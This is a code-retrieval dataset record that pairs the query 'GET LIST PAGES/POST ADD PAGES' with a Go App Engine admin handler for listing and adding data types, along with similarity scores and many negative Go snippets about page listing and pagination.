dfvLevel3:\n\t\treturn databaseTypeNames[DtTimestamp]\n\tcase t == DtSeconddate && dfv < dfvLevel3:\n\t\treturn databaseTypeNames[DtTimestamp]\n\tcase t == DtDaydate && dfv < dfvLevel3:\n\t\treturn databaseTypeNames[DtDate]\n\tcase t == DtSecondtime && dfv < dfvLevel3:\n\t\treturn databaseTypeNames[DtTime]\n\tcase t == DtBoolean && dfv < dfvLevel7:\n\t\treturn databaseTypeNames[DtTinyint]\n\tcase t == DtBintext && dfv < dfvLevel6:\n\t\treturn databaseTypeNames[DtNClob]\n\n\tcase t == DtChar && version.Major() >= 4: // since hdb version 4: char equals nchar\n\t\treturn databaseTypeNames[DtNChar]\n\tcase t == DtVarchar && version.Major() >= 4: // since hdb version 4: varchar equals nvarchar\n\t\treturn databaseTypeNames[DtNVarchar]\n\tcase t == DtClob && version.Major() >= 4: // since hdb version 4: clob equals nclob\n\t\treturn databaseTypeNames[DtNClob]\n\n\tdefault:\n\t\treturn databaseTypeNames[t]\n\t}\n}" ]
[ "0.66651064", "0.6497343", "0.64160186", "0.6286393", "0.62545264", "0.6123289", "0.61106265", "0.61101663", "0.59699", "0.5967814", "0.5966449", "0.5934342", "0.59213394", "0.59168285", "0.58997035", "0.5895523", "0.5870778", "0.5852317", "0.5852317", "0.58443254", "0.5842242", "0.5837393", "0.5816145", "0.580876", "0.57813054", "0.5779005", "0.57610965", "0.57383114", "0.5736202", "0.57352614", "0.57332385", "0.5702032", "0.56816936", "0.56537133", "0.5651291", "0.56489223", "0.56231743", "0.56022316", "0.5598881", "0.5591431", "0.5569412", "0.5562744", "0.5547161", "0.5545323", "0.5545323", "0.5545323", "0.55395836", "0.5527825", "0.550023", "0.54948467", "0.54861426", "0.54854506", "0.54671097", "0.54555047", "0.5436419", "0.54337144", "0.5432234", "0.5432234", "0.54234475", "0.54136807", "0.5410138", "0.53813195", "0.5380386", "0.53791857", "0.5375579", "0.53586066", "0.5351866", "0.5349841", "0.53458405", "0.5343905", "0.53226995", "0.53226566", "0.5321263", "0.5320837", "0.5319667", "0.5313261", "0.5310969", "0.53045696", "0.530217", "0.53014636", "0.52961046", "0.52918124", "0.52894336", "0.5287735", "0.5284791", "0.5277951", "0.52759653", "0.52728206", "0.5269694", "0.52637684", "0.52620727", "0.525981", "0.5256135", "0.5254982", "0.5253413", "0.5251987", "0.5243441", "0.52372", "0.5231008", "0.52276325" ]
0.6284614
4
GET LIST PAGES/POST ADD PAGES
func control_data_type(w http.ResponseWriter, r *http.Request) { //ADMIN checkAdmin(w,r) //CONTEXT c := appengine.NewContext(r) /*******************************GET LIST/ADD**************************/ if r.Method == "GET"{ //DATA data := map[string]string{ "get":"true", "title": "Data", } //QUERY q := datastore.NewQuery("DataType").Limit(100) //DB GET ALL var db []*DataType keys,err := q.GetAll(c,&db) //DB ERR if err != nil { fmt.Fprint(w,"error getting items") return } //VAR var dbData []map[string]string //FOR DB ITEMS for i := range db { //KEYS ENCODE k := keys[i].Encode() dbData = append(dbData, map[string]string { "title": db[i].Title, "key": k, //"fieldNames": db[i].Fields[1].Name, //"fieldUI":db[i].UI, /*Fields: map[string]string{ "Name":"text", "Email":"text", "Phone":"text", "Message":"textarea", },*/ }, ) } //fmt.Fprintln(w,data) //fmt.Fprintln(w,dbData) //fmt.Fprintln(w,r.Header.Get("X-Requested-With")) //"X-Requested-With" if r.Header.Get("X-Requested-With") != "" { //MARSHAL JSON j,errJSON := json.Marshal(dbData) if errJSON != nil { fmt.Fprintln(w,"error with JSON") } //SET CONTENT-TYPE w.Header().Set("Content-Type", "application/json") //DISPLAY JSON fmt.Fprint(w,string(j)) } else { renderControl(w, r, "/control/data.html", data, dbData) } /********************************POST ADD*********************************/ } else { //GET FORM VALS formVal := func(val string)string{ return r.FormValue(val) } //newFields := map[string]string {} //fmt.Fprintln(w,r) TheFields := []FieldType {} FieldCount,_ := strconv.Atoi(formVal("field_count")) FieldCount = FieldCount - 1 for i := 0; i <= FieldCount; i++ { iCount := strconv.Itoa(i) TheFields = append(TheFields, FieldType { Name: formVal("fieldName" + iCount), Order: formVal("fieldOrder" + iCount), UI: formVal("fieldUI" + iCount), //Errors: formVal("fieldErrors" + iCount), }) //fmt.Fprintln(w,formVal("fieldName" + iCount)) //fmt.Fprintln(w,formVal("fieldName0")) //fmt.Fprintln(w, FieldCount) //fmt.Fprintln(w,iCount) } /* { Name: formVal("fieldName1"), Label: formVal("fieldLabel1"), UI: formVal("fieldUI1"), Errors: formVal("fieldErrors1"), }, { Name: formVal("fieldName2"), Label: formVal("fieldLabel2"), UI: formVal("fieldUI2"), Errors: formVal("fieldErrors2"), }, }*/ //PRETTIFY URL reg, err := regexp.Compile("[^A-Za-z0-9]+") if err != nil { fmt.Fprintln(w,"error with RegX") } prettyurl := reg.ReplaceAllString(formVal("slug"), "-") prettyurl = strings.ToLower(strings.Trim(prettyurl, "-")) //fmt.Fprintln(w,prettyurl) //MAP FORM VALS newType := DataType { Title: formVal("typeName"), TemplateList: formVal("data_type_template_list"), TemplateItem: formVal("data_type_template_item"), Description: formVal("description"), Keywords: formVal("keywords"), URL: prettyurl, Fields: TheFields, } //fmt.Fprintln(w,newType) //DB PUT key, err := datastore.Put(c, datastore.NewIncompleteKey(c, "DataType", nil), &newType) //IF ERRORS if err != nil { fmt.Fprint(w,"error adding") return //NO ERRORS } else { cacheFlush("types",r) //DEBUG //fmt.Fprintln(w,"added successfully") //fmt.Fprintln(w,"key: " + key.Encode()) //PREP JSON m := map[string]string{ "message":"new type added", "key":key.Encode(), "title":newType.Title, "adminSlug":AdminSlug, } //MARSHAL JSON j,errJSON := json.Marshal(m) if errJSON != nil { fmt.Fprintln(w,"error with JSON") } //DISPLAY JSON w.Header().Set("Content-Type", "application/json") fmt.Fprint(w,string(j)) return //END ERRORS } //END POST } //END FUNC }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestListPage(t *testing.T) {\n\n\t// Get all pages (we should have at least one)\n\tresults, err := FindAll(Query())\n\tif err != nil {\n\t\tt.Fatalf(\"pages: List no page found :%s\", err)\n\t}\n\n\tif len(results) < 1 {\n\t\tt.Fatalf(\"pages: List no pages found :%s\", err)\n\t}\n\n}", "func (h *PageHandler) ListPages(c *fiber.Ctx) error {\n\tpages, err := h.repository.FindAllByCategorySlug(c.Params(\"pageCategory\"))\n\n\tif err != nil {\n\t\tlog.Debugf(\"Error while getting pages by category slug %s\", err)\n\t\treturn h.Error(404)\n\t}\n\n\treturn h.JSON(c, 200, pages)\n}", "func (hs Handlers) APIPagesCreate(c echo.Context) error {\n\ttype Request struct {\n\t\tPostID string `json:\"post_id\" validate:\"required,min=1\"`\n\t\tIndex int `json:\"index\" validate:\"required\"`\n\t\tSlug string `json:\"slug\" validate:\"required,min=1\"`\n\t\tInNavigation bool `json:\"in_navigation\"`\n\t}\n\ttype Response struct {\n\t\tID string `json:\"id\"`\n\t\tIndex int `json:\"index\"`\n\t\tSlug string `json:\"slug\"`\n\t\tInNavigation bool `json:\"in_navigation\"`\n\t\tCreatedAt time.Time `json:\"created_at\"`\n\t\tUpdatedAt time.Time `json:\"updated_at\"`\n\t}\n\treq := Request{}\n\terr := c.Bind(&req)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = validator.New().Struct(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\t//page, err := pageModel.Create(\n\t//\ths.DB,\n\t//\treq.PostID,\n\t//\treq.Index,\n\t//\treq.Slug,\n\t//\treq.InNavigation,\n\t//)\n\t//res := Response{\n\t//\tID: page.ID,\n\t//\tIndex: page.Index,\n\t//\tSlug: page.Slug,\n\t//\tInNavigation: page.InNavigation,\n\t//\tCreatedAt: page.CreatedAt,\n\t//\tUpdatedAt: page.UpdatedAt,\n\t//}\n\t//return c.JSON(http.StatusOK, &res)\n\treturn nil\n}", "func (s *PagesService) List(ctx context.Context, limit, offset int) ([]*Page, *http.Response, error) {\n\tif limit < 1 {\n\t\treturn nil, nil, fmt.Errorf(\"limit must be above 0, but %d is not\", limit)\n\t}\n\tif limit > 500 {\n\t\treturn nil, nil, fmt.Errorf(\"limit must be 500 or below, but %d is not\", limit)\n\t}\n\tu := fmt.Sprintf(\"v1/pages?limit=%d&offset=%d\", limit, offset)\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\treq.Header.Set(\"Accept\", \"application/json\")\n\n\tvar pages []*Page\n\tresp, err := s.client.Do(ctx, req, &pages)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn pages, resp, nil\n}", "func AddPostPage(w http.ResponseWriter, r *http.Request) {\n\tif _, err := cmanager.SessionExist(r); err != nil {\n\t\thttp.Redirect(w, r, \"/login\", http.StatusSeeOther)\n\t\treturn\n\t}\n\tthreads := threadsmanager.GetThreads()\n\tuser := usermanager.GetUser(r)\n\tpostCreationStruct := addpoststruct{User: user, Threads: threads}\n\terr := tools.Templates.ExecuteTemplate(w, \"addpost.html\", postCreationStruct)\n\tif err != nil {\n\t\tlog.Fatal(\" /// \" + err.Error())\n\t}\n}", "func (c *PagesService) List(ctx context.Context, opts *PageListOptions) ([]*Page, *Response, error) {\n\tu, err := c.Client.AddOptions(\"pages\", opts)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\treq, err := c.Client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tpages := []*Page{}\n\tresp, err := c.Client.Do(ctx, req, &pages)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\t// set collection object for each entity which has sub-collection\n\tfor _, p := range pages {\n\t\tp.setService(c)\n\t}\n\n\treturn pages, resp, nil\n}", "func NotesListPage(w http.ResponseWriter, req *http.Request) {\n\tswitch req.Method {\n\tcase \"GET\":\n\t\t// return list of valid note IDs\n\n\tdefault:\n\t\t// Give an error message.\n\t}\n\n}", "func (sp *jsonServerPage) getAll(token string) (pages []*jsonServerPage, err error) {\n\tpages = append(pages, sp)\n\tfor pages[len(pages)-1].Meta.Pagination.Links.Next != \"\" {\n\t\turl := sp.Meta.Pagination.Links.Next + \"&include=allocations\"\n\t\tbytes, err := queryURL(url, token, \"GET\", nil)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tvar page jsonServerPage\n\t\terr = json.Unmarshal(bytes, &page)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tpages = append(pages, &page)\n\t}\n\n\treturn pages, nil\n}", "func renderListPage(ctx *Context, page *model.ListPage) error {\n\tpagePath := filepath.Join(ctx.TargetDir, page.Path)\n\n\tif err := renderPage(ctx, pagePath, template.ListPage, page); err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func fn_get__amount_pages(_c_amount_pages chan int) {\n\n\tres := fn_get__http()\n\n\tdefer res.Body.Close()\n\n\tdoc, err := goquery.NewDocumentFromReader(res.Body)\n\n\tfn_check__error(err)\n\n\t// first page + extra pages\n\tint_pages := doc.Find(\".tplPagination > ul a\").Length() + 1\n\n\t_c_amount_pages <- int_pages\n}", "func pages(pageDir string) ([]string, error) {\n\treturn filepath.Glob(filepath.Join(pageDir, \"*.page.html\"))\n}", "func (p *provider) page(initialURL, token string, newObj func() interface{}, processObj func(interface{}) error) error {\n\t// track urls we've fetched to avoid cycles\n\turl := initialURL\n\tfetchedURLs := sets.NewString(url)\n\tfor {\n\t\t// fetch and process\n\t\tobj := newObj()\n\t\tlinks, err := p.getJSON(url, token, obj)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif err := processObj(obj); err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// see if we need to page\n\t\t// https://developer.github.com/v3/#link-header\n\t\turl = links[\"next\"]\n\t\tif len(url) == 0 {\n\t\t\t// no next URL, we're done paging\n\t\t\tbreak\n\t\t}\n\t\tif fetchedURLs.Has(url) {\n\t\t\t// break to avoid a loop\n\t\t\tbreak\n\t\t}\n\t\t// remember to avoid a loop\n\t\tfetchedURLs.Insert(url)\n\t}\n\treturn nil\n}", "func listExistingPages(files []string) {\n\t// cycle all files in the folder\n\tfor _, file := range files {\n\t\t// extract name without extension and print it\n\t\tlog.Println(\"http://localhost:8080/view/\" + strings.Split(file, \".\")[0])\n\t}\n}", "func fetchPageList() []string {\n\tdirname := \"./pages\"\n\n\tf, err := os.Open(dirname)\n\tif err != nil {\n\t\tlog.Println(\"listExistingPages() error: \", err)\n\t\tlog.Fatal(err)\n\t}\n\n\tfiles, err := f.Readdir(-1)\n\tf.Close()\n\tif err != nil {\n\t\tlog.Println(\"listExistingPages() error: \", err)\n\t\tlog.Fatal(err)\n\t}\n\n\t// Stores the list of available pages to show on the homepage\n\tvar pagesSlice []string\n\tfor _, file := range files {\n\t\tpagesSlice = append(pagesSlice, strings.Split(file.Name(), \".\")[0])\n\t}\n\n\treturn pagesSlice\n}", "func ListArticlesWithPage(w http.ResponseWriter, r *http.Request) {\n\tvar err error\n\tvar lim_int int\n\tvar off_int int\n\tvar articles []*models.Posts\n\n\tlimit := chi.URLParam(r, \"limit\")\n\toffset := chi.URLParam(r, \"offset\")\n\n\tlim_int, err = strconv.Atoi(limit)\n\tif err != nil {\n\t\trender.Render(w, r, ErrNotFound)\n\t\treturn\n\t}\n\n\toff_int, err = strconv.Atoi(offset)\n\tif err != nil {\n\t\trender.Render(w, r, ErrNotFound)\n\t\treturn\n\t}\n\n\tarticles, err = dbListArticlePage(&lim_int, &off_int)\n\tif err != nil {\n\t\trender.Render(w, r, ErrNotFound)\n\t\treturn\n\t}\n\n\n\tif err := render.RenderList(w, r, NewArticleListResponse(articles)); err != nil {\n\t\trender.Render(w, r, ErrRender(err))\n\t\treturn\n\t}\n}", "func GetAllPages(w http.ResponseWriter, r *http.Request) {\n\tresponse := services.LoadAllPages(r)\n\n\trender.Status(r, response.Code)\n\trender.JSON(w, r, response)\n}", "func NewPagedList(items []*discordgo.MessageEmbedField, maxResults int) (*PagedList, error) {\n\tif len(items) == 0 {\n\t\treturn nil, fmt.Errorf(\"No page items found.\")\n\t}\n\n\treturn &PagedList{\n\t\tItems: items,\n\t\tMaxResults: maxResults,\n\t\tPageNumber: 1,\n\t\tTotalPages: int(math.Ceil(float64(len(items)) / float64(maxResults))),\n\t\tFirstPage: true,\n\t\tLastPage: false,\n\t\tExt: new(map[string]interface{}),\n\t}, nil\n}", "func ReturnALLPosts(response http.ResponseWriter, request *http.Request){\n\tvar posts []Post\n\t \n\trequest.ParseForm()\n\tvar u string = request.URL.Path\n\tquery := request.URL.Query()\n\tindex,_ := strconv.Atoi(query.Get(\"index\")) // Getting Cursor value from user to implement cursor paggination\n\tuid := u[13:]\n\t\n \n\n\t\tcollection := client.Database(\"Go_task\").Collection(\"posts\")\n\t\tctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)\n\t\tdefer cancel()\n\t\tcursor, err := collection.Find(ctx, bson.M{\"uid\":uid})\n\t\tif err != nil {\n\t\t\tresponse.WriteHeader(http.StatusInternalServerError)\n\t\t\tresponse.Write([]byte(`{ \"message\": \"` + err.Error() + `\" }`))\n\t\t\treturn\n\t\t}\n\t\tdefer cursor.Close(ctx)\n\t\tfor cursor.Next(ctx) {\n\t\t\tvar post Post\n\t\t\tcursor.Decode(&post)\n\t\t\n\t\t\tposts = append(posts, post)\n\n\t\t}\n\t\t\n\t\tif err = cursor.Err(); err != nil {\n\t\t\tresponse.WriteHeader(http.StatusInternalServerError)\n\t\t\tresponse.Write([]byte(`{ \"message\": \"` + err.Error() + `\" }`))\n\t\t\treturn\n\t\t}\n\t\t\n\t\tjson.NewEncoder(response).Encode(posts[index:])\n}", "func getAllPages(d string) []*page {\n\tpages := []*page{}\n\t// Match all the pages\n\tpageRe := regexp.MustCompile(`(?ms)^%% Page (\\d+)\\n%%[^\\n]*\\n\\d+\\s+\\d+\\s+obj\\n<<\\n(.*?)\\n^>>\\n^endobj`)\n\n\tpageM := pageRe.FindAllStringSubmatch(d, -1)\n\tfor _, pm := range pageM {\n\t\tpNum, _ := strconv.Atoi(pm[1])\n\t\tp := page{number: pNum, raw: pm[2]}\n\t\tif err := p.extractAttrs(); err != nil {\n\t\t\tlog.Print(err)\n\t\t\tcontinue\n\t\t}\n\t\tpages = append(pages, &p)\n\t}\n\n\treturn pages\n}", "func userList(w http.ResponseWriter, r *http.Request) {}", "func (app *Application) handlerPages(resp http.ResponseWriter, req *http.Request) {\n\tctx := req.Context()\n\n\ttopics, err := app.DB.GetAll(ctx)\n\tif err != nil {\n\t\terrorOut(err, resp)\n\t\treturn\n\t}\n\n\tokOut(topics, resp)\n}", "func getPage(c *gin.Context) {\n\tfmt.Println(\"getPage\")\n\n\t// TODO: check mode\n\t// if local\n\tr := getFilestoreDoc(c.Param(\"id\"))\n\n\t// if firestore\n\t// TODO: add firestore\n\n\tc.JSON(http.StatusOK, r)\n}", "func getCatalogsPage(res http.ResponseWriter, req *http.Request, params httprouter.Params) {\n\tpu, _ := GetUserFromSession(res, req)\n\tServeTemplateWithParams(res, \"catalogs.html\", pu)\n}", "func FetchListPage(spider models.Spider) ([]models.Event, error) {\n\tc := newCollector(spider.Domain)\n\teventDetailCollector := c.Clone()\n\n\tvar events []models.Event\n\n\t// Find and visit all events links\n\tc.OnHTML(spider.EventLinkSelector, func(e *colly.HTMLElement) {\n\t\teventDetailCollector.Visit(absoluteURLBuilder(e))\n\t})\n\n\t// Find the next page and visit it\n\tif spider.NextPageSelector.Selector != \"\" {\n\t\tc.OnHTML(spider.NextPageSelector.Selector, func(e *colly.HTMLElement) {\n\t\t\tif spider.NextPageSelector.NeededText != \"\" {\n\t\t\t\tif e.Text != spider.NextPageSelector.NeededText {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\te.Request.Visit(e.Attr(\"href\"))\n\t\t\t}\n\t\t})\n\t}\n\n\tc.OnError(func(r *colly.Response, err error) {\n\t\tlog.Println(\"Request URL:\", r.Request.URL, \"failed with response: Error:\", err)\n\t})\n\n\teventDetailCollector.OnHTML(spider.EventDetailsContainerSelector, func(e *colly.HTMLElement) {\n\t\tevent := extractEvent(e, spider)\n\t\tif event.Name != \"\" {\n\t\t\tevents = append(events, event)\n\t\t}\n\t})\n\n\teventDetailCollector.OnError(func(r *colly.Response, err error) {\n\t\tlog.Println(\"Request URL:\", r.Request.URL, \"failed with response: Error:\", err)\n\t})\n\n\tc.Visit(spider.ListURL)\n\n\tif len(events) == 0 {\n\t\treturn []models.Event{}, errors.New(\"No events for spider: \" + spider.Domain)\n\t}\n\n\treturn events, nil\n}", "func (h *Handler) AddPage(c echo.Context) error {\n\tm := echo.Map{}\n\tif err := c.Bind(&m); err != nil {\n\t\treturn err\n\t}\n\troute, title := m[\"route\"].(string), m[\"title\"].(string)\n\n\tuserDataMap := utils.GetUserDataFromContext(&c)\n\temail := (*userDataMap)[\"email\"].(string)\n\n\tpage, err := h.pageStore.AddPage(email, route, title)\n\tif err != nil {\n\t\tutils.Logger.Error(err)\n\t\treturn c.JSON(http.StatusInternalServerError, createRes(false, nil, nil, http.StatusText(http.StatusInternalServerError)))\n\t}\n\treturn c.JSON(http.StatusOK, createRes(true, page, nil, \"\"))\n}", "func ProcessPage(db *gorm.DB, age string, url string, totalNumAdded *int, totalNumSkipped *int) {\n\tfmt.Println(\"Processing: \", url)\n\n\tdoc, err := processHTML(url)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tnumAdded := 0\n\tnumSkipped := 0\n\n\t// Each book listing is inside a div with the class 'detailOneCol'\n\t// Find all of those listings, loop over them and create a Book\n\tdoc.Find(\".detailOneCol\").Each(func(i int, s *goquery.Selection) {\n\t\ttitle := s.Find(\".text h3 a\").Text()\n\t\turl, _ := s.Find(\".text h3 a\").Attr(\"href\")\n\n\t\tvar book = database.Book{}\n\t\t// Check to see if book already exists in db (using url)\n\t\t// If it exists, FirstOrCreate returns the existing record\n\t\t// If it DOESN'T exist, use Attrs() to specify the values to be saved to the db,\n\t\t// then FirstOrCreate creates the record\n\t\t// Note: IsNew is a virtual field that's not saved to the db\n\t\tdb.\n\t\t\tWhere(database.Book{URL: url}).\n\t\t\tAttrs(database.Book{Title: title, URL: url, Age: age, IsNew: true}).\n\t\t\tFirstOrCreate(&book)\n\n\t\t// Use IsNew field to determine if the book\n\t\t// is newly created or already exists\n\t\tif book.IsNew {\n\t\t\tnumAdded++\n\t\t} else {\n\t\t\tnumSkipped++\n\t\t}\n\t})\n\n\t*totalNumAdded = *totalNumAdded + numAdded\n\t*totalNumSkipped = *totalNumSkipped + numSkipped\n\n\tfmt.Printf(\"→ Added: Page (%d) Total (%d). Skipped: Page (%d) Total (%d).\\n\\n\", numAdded, *totalNumAdded, numSkipped, *totalNumSkipped)\n\n\t// Call this function again to recursively work our way through\n\t// each page in the particular age we're already looping through\n\tdoc.Find(\".pageSending\").First().Find(\"a\").Each(func(i int, s *goquery.Selection) {\n\t\tif s.Text() == \"次へ→\" {\n\t\t\thref, _ := s.Attr(\"href\")\n\t\t\tProcessPage(db, age, buildSubURL(href), totalNumAdded, totalNumSkipped)\n\t\t}\n\t})\n\n}", "func compositePages(response http.ResponseWriter, request *http.Request) {\n\t// Build the folder names. Normally, these would not be defined in the function, but in the\n\t// pagage or struct.\n\ttemplatesFolder := \"sitehelpers/simple-res/templates/\"\n\tbodiesFolder := templatesFolder + \"bodies/\"\n\tcommonFolder := templatesFolder + \"common/\"\n\n\t// get the body file name to build the\n\tbody := mux.Vars(request)[\"body\"]\n\n\t// build the filenames (in this case it's page1.html and common.html because it's a demo)\n\tbodyFilename := bodiesFolder + body + \".html\"\n\tcommonFilename := commonFolder + \"common.html\"\n\n\t// parse the templates or 404\n\tif exists(commonFilename) && exists(bodyFilename) {\n\t\ttemplateSet, _ := template.ParseFiles(commonFilename, bodyFilename)\n\t\t// Why nil? because we're not sending any info or data to the templates\n\t\t// \"base\" is the name of the common template. Maybe I should sync this idea up\n\t\ttemplateSet.ExecuteTemplate(response, \"base\", nil)\n\t} else {\n\t\tdo404(response)\n\t}\n}", "func GetAllPost(w http.ResponseWriter, r *http.Request) {\n\tpage := r.URL.Query()[\"page\"]\n\tuserID := r.URL.Query()[\"user\"]\n\n\tfilter := bson.M{}\n\tfilter[\"status\"] = bson.M{\n\t\t\"$ne\": poststatus.Deleted,\n\t}\n\n\tif len(userID) > 0 {\n\t\tuID, err := primitive.ObjectIDFromHex(userID[0])\n\t\tif err != nil {\n\t\t\tresponse.Error(w, http.StatusUnprocessableEntity, err.Error())\n\t\t\treturn\n\t\t}\n\t\tfilter[\"user_id\"] = uID\n\t}\n\n\tvar count int\n\n\tif len(page) > 0 {\n\t\tfmt.Println(\"STUFF\", len(page))\n\t\tnum, err := strconv.Atoi(page[0])\n\t\tif err != nil {\n\t\t\tresponse.Error(w, http.StatusUnprocessableEntity, err.Error())\n\t\t\treturn\n\t\t}\n\t\tcount = num\n\t} else {\n\t\tcount = 0\n\t}\n\n\tposts, err := GetAll(filter, count)\n\n\tif err != nil {\n\t\tresponse.Error(w, http.StatusUnprocessableEntity, err.Error())\n\t\treturn\n\t}\n\n\tif posts == nil {\n\t\tposts = []GetPostStruct{}\n\t}\n\n\tresponse.Success(w, r,\n\t\thttp.StatusOK,\n\t\tposts,\n\t)\n\treturn\n}", "func (feed *Feed) AddPagination(numberItems int, itemsPerPage int, currentPage int, nextLink string, prevLink string, firstLink string, lastLink string) {\n\n\tfeed.Metadata.CurrentPage = currentPage\n\tfeed.Metadata.ItemsPerPage = itemsPerPage\n\tfeed.Metadata.NumberOfItems = numberItems\n\n\tif nextLink != \"\" {\n\t\tfeed.AddLink(nextLink, \"next\", \"application/opds+json\", false)\n\t}\n\tif prevLink != \"\" {\n\t\tfeed.AddLink(prevLink, \"previous\", \"application/opds+json\", false)\n\t}\n\tif firstLink != \"\" {\n\t\tfeed.AddLink(firstLink, \"first\", \"application/opds+json\", false)\n\t}\n\tif lastLink != \"\" {\n\t\tfeed.AddLink(lastLink, \"last\", \"application/opds+json\", false)\n\t}\n}", "func repoList(w http.ResponseWriter, r *http.Request) {}", "func pages(response http.ResponseWriter, request *http.Request) {\n\tpagesFolder := \"sitehelpers/simple-res/templates/pages/\"\n\tpage := mux.Vars(request)[\"page\"]\n\n\tfilename := pagesFolder + page + \".html\"\n\n\tif exists(filename) {\n\t\thtml, _ := ioutil.ReadFile(filename)\n\t\tfmt.Fprintf(response, string(html))\n\t} else {\n\t\tdo404(response)\n\t}\n}", "func NewListPage(getNextPage func(context.Context, List) (List, error)) ListPage {\n\treturn ListPage{fn: getNextPage}\n}", "func calPageList(p, maxPageNum int) []*page {\n\tlistSize := 15\n\thls := listSize / 2\n\tpl := make([]*page, 0, listSize)\n\n\tstart, end := p-hls, p+hls\n\tif p < hls+1 {\n\t\tstart, end = 1, listSize\n\t}\n\n\tif end > maxPageNum {\n\t\tend = maxPageNum\n\t}\n\n\tfor i := start; i <= end; i++ {\n\t\tpl = append(pl, &page{\n\t\t\tIsActive: i == p,\n\t\t\tPageNum: i,\n\t\t})\n\t}\n\treturn pl\n}", "func (p *Pictures) nextPage() (newItems []string) {\n\tp.Logger.Debug().Int(\"Getting new page... items len\", len(p.Items)).Send()\n\n\tx, err := goquery.ParseUrl(domain + p.nextPageURL)\n\tif err != nil {\n\t\tp.Logger.Panic().Err(err).Send()\n\t\tpanic(err)\n\t}\n\n\tnewItems = x.Find(\"#post_list .postContainer .article div.post_top div.post_content div.image img\").Attrs(\"src\")\n\n\tp.Items = append(p.Items, newItems...)\n\tp.nextPageURL = x.Find(\"#Pagination .pagination_main a\").Attrs(\"href\")[1]\n\n\tp.Logger.Debug().Int(\"Successfully got new page... items len\", len(p.Items)).Send()\n\n\treturn\n}", "func (l *Container) AddPage(lines []*line.Line, pagination *Pagination, r *colly.Response) {\n\tmux.Lock()\n\tdefer mux.Unlock()\n\n\tcurrentPage := 1\n\tif pagination != nil {\n\t\tcurrentPage = pagination.Current\n\t}\n\n\tl.Data[currentPage] = lines\n}", "func GetPages() ([]Page, error) {\n\tvar list []Page\n\terr := db.Select(&list, \"SELECT * FROM pages ORDER BY id\")\n\treturn list, err\n}", "func GetPages() ([]model.Page, error) {\n\tvar rows []model.Page\n\t_, err := sess.Select(\"*\").From(\"page\").Load(&rows)\n\treturn rows, err\n}", "func (hpSrv *HomePageServ) List() {\n\tvar (\n\t\tarticelMd []serializer.ArticleModel\n\t)\n\tconf.MYSQL_CONNECT.Order(\"created_at desc\").Find(&articelMd)\n\tif hpSrv.Limit == 0 {\n\t\thpSrv.Limit = 4\n\t}\n\thpSrv.setArticleSet(articelMd)\n\thpSrv.pageCount = setPageCount(len(articelMd), hpSrv.Limit)\n\thpSrv.setPage()\n}", "func (posts *Posts) GetPostList(page, size int64, isPage bool, onlyPublished bool, orderBy string) (*utils.Pager, error) {\n\tvar pager *utils.Pager\n\tcount, err := GetNumberOfPosts(isPage, onlyPublished)\n\tpager = utils.NewPager(page, size, count)\n\n\tif !pager.IsValid {\n\t\treturn pager, fmt.Errorf(\"Page not found\")\n\t}\n\n\tsafeOrderBy := getSafeOrderByStmt(orderBy)\n\n\tsession := postSession.Clone()\n\n\tif onlyPublished {\n\t\terr = session.DB(DBName).C(\"posts\").Find(bson.M{\"ispage\": isPage, \"ispublished\": true}).Sort(safeOrderBy).Skip(int(pager.Begin)).Limit(int(size)).All(posts)\n\t} else {\n\t\terr = session.DB(DBName).C(\"posts\").Find(bson.M{\"ispage\": isPage}).Sort(safeOrderBy).Skip(int(pager.Begin)).Limit(int(size)).All(posts)\n\t}\n\n\treturn pager, err\n}", "func Page(w http.ResponseWriter, r *http.Request, ps httprouter.Params) {\n\tp, err := strconv.ParseUint(ps.ByName(\"page\"), 10, 8)\n\tif err != nil {\n\t\thttp.NotFound(w, r)\n\t}\n\tdata, err := newPageData(uint8(p))\n\tif err != nil {\n\t\thttp.NotFound(w, r)\n\t}\n\terr = t.ExecuteTemplate(w, \"index\", data)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}", "func HomePageList(c *server.Context) error {\n\tvar (\n\t\terr error\n\t\tres []ware.BriefInfo\n\t\tidReq struct {\n\t\t\tLastID uint32 `json:\"last_id\"`\n\t\t}\n\t)\n\n\terr = c.JSONBody(&idReq)\n\tif err != nil {\n\t\tlogger.Error(err)\n\t\treturn core.WriteStatusAndDataJSON(c, constants.ErrInvalidParam, nil)\n\t}\n\n\terr = c.Validate(idReq)\n\tif err != nil {\n\t\tlogger.Error(err)\n\t\treturn core.WriteStatusAndDataJSON(c, constants.ErrInvalidParam, nil)\n\t}\n\n\tconn, err := mysql.Pool.Get()\n\tdefer mysql.Pool.Release(conn)\n\tif err != nil {\n\t\tlogger.Error(err)\n\t\treturn core.WriteStatusAndDataJSON(c, constants.ErrMysql, nil)\n\t}\n\n\tres, err = ware.Service.HomePageList(conn, idReq.LastID)\n\tif err != nil {\n\t\tlogger.Error(err)\n\t\treturn core.WriteStatusAndDataJSON(c, constants.ErrMysql, nil)\n\t}\n\n\treturn core.WriteStatusAndDataJSON(c, constants.ErrSucceed, res)\n}", "func (s *pages) appendPage(page *model.Page) {\n\ts.collection = append(s.collection, page)\n}", "func (h *Handler) GetAllPages(c echo.Context) error {\n\tuserDataMap := utils.GetUserDataFromContext(&c)\n\temail := (*userDataMap)[\"email\"].(string)\n\n\tpages, err := h.pageStore.GetAllPages(email)\n\tif err != nil {\n\t\tutils.Logger.Error(err)\n\t\treturn c.JSON(http.StatusNotFound, createRes(false, nil, nil, http.StatusText(http.StatusNotFound)))\n\t}\n\treturn c.JSON(http.StatusOK, createRes(true, pages, 